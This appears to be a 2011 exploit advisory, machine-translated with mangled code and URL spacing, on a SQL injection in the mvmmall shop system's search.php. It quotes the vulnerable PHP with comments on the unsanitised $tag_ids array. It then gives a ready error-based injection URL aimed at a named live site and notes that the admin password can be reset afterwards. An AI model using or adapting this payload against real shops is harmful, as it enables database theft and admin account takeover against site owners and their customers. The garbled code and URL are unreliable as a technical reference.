mvmmall shop Mall system injection vulnerability-vulnerability warning-the black bar safety net

2011-03-30T00:00:00
ID MYHACK58:62201129905
Type myhack58
Reporter 佚名
Modified 2011-03-30T00:00:00

Description

mvmmall shop Mall system, the latest injection 0day issues out in the search search. php this file.

The code is as follows:

<? php require_once ‘include/common.inc.php’; require_once ROOTPATH.’header.php’; if($action!=’ search’){ $search_key = ”; if (isset($ps_search)) { //Omitted a bunch of stuff $tag_ids = array(); //in the if. //Continue to omit while ($row = $db->fetch_array($result)) { $tag_ids[] = $row['goods_id']; } //Also be in the if. } //Omitted a bunch of stuff } //End if something //Product tags to search $tag_ids = array_unique($tag_ids); //no ps_search he didn't initialize it! You can enter your own $tag_search = implode(‘,’,dhtmlchars($tag_ids)); //dhtmlchars filter HTML tags don't bother $tag_search && $tag_search = “OR uid IN($tag_search)”; //call..... Success! //Omitted unrelated stuff $search_sql = "WHERE upv = '1' AND up_date<='$m_now_time'"." AND (( 1 ” . $cat_search . $search_key . $brand_search . $min_search . $max_search .” ) “.$ tag_search.” )”;//No single quotes.... $total_count = $db->counter($mvm_goods_table,$search_sql);

With the ADMIN user and the MALL after use the Retrieve password function mvm_lostpass store the validation string directly change the password.

Testing EXP to:

<http://www.dj4now.com/search.php?tag_ids[goods_id]=uid))%20and(select%2 0 1%20from(select%20count(),concat((select%2 0(select%20user())%20from%20information_schema. tables%20limit%200,1),floor(rand(0)2))x%20from%20information_schema. tables%20group%20by%20x)a)%20and%2 0 1=1%2 3>

BY:http://www. dj4now. com/